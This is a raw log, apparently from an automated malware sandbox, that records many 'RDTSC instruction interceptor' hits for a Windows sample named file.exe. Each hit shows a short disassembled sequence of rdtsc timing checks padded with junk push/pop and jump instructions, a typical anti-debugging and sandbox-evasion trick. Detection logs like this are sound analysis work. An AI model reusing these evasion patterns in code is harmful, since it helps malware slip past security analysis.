Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7955C3 second address: 7955C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7955C8 second address: 7955DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007FCA94C93E42h 0x0000000b ja 00007FCA94C93E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7465C5 second address: 7465CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79A575 second address: 79A593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA94C93E3Fh 0x0000000b jp 00007FCA94C93E36h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EC70 second address: 79EC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EC76 second address: 79EC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A14E8 second address: 7A14ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A73F6 second address: 7A73FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A73FB second address: 7A740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007FCA94618472h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A740F second address: 7A7415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7415 second address: 7A7448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94618473h 0x00000009 jmp 00007FCA94618476h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7448 second address: 7A744C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A744C second address: 7A7452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A797B second address: 7A7993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7993 second address: 7A79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 js 00007FCA94618468h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCA9461846Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7EC5 second address: 7A7EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A81EA second address: 7A8208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618474h 0x00000007 jng 00007FCA94618466h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8208 second address: 7A8213 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FCA94C93E36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A84CC second address: 7A84DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FCA94618466h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A87D0 second address: 7A87D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A87D4 second address: 7A87E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8DBE second address: 7A8DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8DC2 second address: 7A8DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A909E second address: 7A90A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A90A2 second address: 7A90A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC279 second address: 7AC27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC27D second address: 7AC291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FCA9461846Ch 0x0000000e jg 00007FCA94618466h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC811 second address: 7AC817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC817 second address: 7AC81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B1B second address: 7B9B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B24 second address: 7B9B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B2A second address: 7B9B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B2E second address: 7B9B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B32 second address: 7B9B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007FCA94C93E36h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jp 00007FCA94C93E36h 0x0000001a pop edx 0x0000001b je 00007FCA94C93E3Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9B55 second address: 7B9B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BA6 second address: 7B7BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94C93E3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BB7 second address: 7B7BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BBB second address: 7B7BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCA94C93E3Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCA94C93E48h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BED second address: 7B7C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA9461846Bh 0x00000009 jnl 00007FCA94618466h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7C02 second address: 7B7C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8078 second address: 7B8098 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618475h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8098 second address: 7B80B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B80B0 second address: 7B80B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8347 second address: 7B834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B834B second address: 7B8364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618475h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8364 second address: 7B8381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCA94C93E3Ah 0x0000000d jmp 00007FCA94C93E3Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8381 second address: 7B83AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCA9461846Ch 0x0000000e jl 00007FCA94618466h 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007FCA94618473h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B83AE second address: 7B83B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B83B4 second address: 7B83B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9960 second address: 7B998C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA94C93E3Ch 0x00000008 jl 00007FCA94C93E52h 0x0000000e jmp 00007FCA94C93E46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7742 second address: 7B7771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jne 00007FCA94618477h 0x00000011 jmp 00007FCA94618471h 0x00000016 js 00007FCA9461846Ah 0x0000001c push eax 0x0000001d pop eax 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD94C second address: 7BD952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD952 second address: 7BD95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD95B second address: 7BD961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD961 second address: 7BD98B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA94618475h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA9461846Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2815 second address: 7C2819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2819 second address: 7C282E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FCA94618468h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C282E second address: 7C2847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E41h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2847 second address: 7C284B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C284B second address: 7C284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C284F second address: 7C2855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D2096 second address: 7D20C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E3Dh 0x00000009 jmp 00007FCA94C93E3Dh 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FCA94C93E36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20C1 second address: 7D20C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20C5 second address: 7D20DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007FCA94C93E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FCA94C93E3Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C16 second address: 7D1C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C20 second address: 7D1C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C24 second address: 7D1C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C30 second address: 7D1C49 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FCA94C93E36h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C49 second address: 7D1C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C58 second address: 7D1C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E45h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FCA94C93E36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C77 second address: 7D1C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1DBD second address: 7D1DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007FCA94C93E3Ch 0x0000000b jnp 00007FCA94C93E36h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C19 second address: 7D5C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C1F second address: 7D5C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA94C93E47h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C40 second address: 7D5C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C47 second address: 7D5C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007FCA94C93E36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C53 second address: 7D5C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7F83 second address: 7D7F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7F8F second address: 7D7F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D80D6 second address: 7D80F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FCA94C93E43h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D80F4 second address: 7D80FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5DC2 second address: 7E5DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA94C93E36h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5DCF second address: 7E5DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EEB54 second address: 7EEB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED39E second address: 7ED3B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618470h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED3B2 second address: 7ED3F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E48h 0x00000007 jmp 00007FCA94C93E48h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FCA94C93E42h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED57D second address: 7ED58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCA94618466h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED58C second address: 7ED590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED590 second address: 7ED59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FCA94618466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED59C second address: 7ED5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED9E3 second address: 7ED9ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDB39 second address: 7EDB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDCDD second address: 7EDCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDCE2 second address: 7EDD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E49h 0x00000007 push eax 0x00000008 jmp 00007FCA94C93E42h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDD19 second address: 7EDD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDD1F second address: 7EDD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F2303 second address: 7F2307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEC04 second address: 7FEC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCA94C93E36h 0x0000000a jmp 00007FCA94C93E41h 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEC26 second address: 7FEC2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB353 second address: 7FB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB357 second address: 7FB376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push esi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C98A second address: 80C99E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FCA94C93E36h 0x0000000f rdtsc
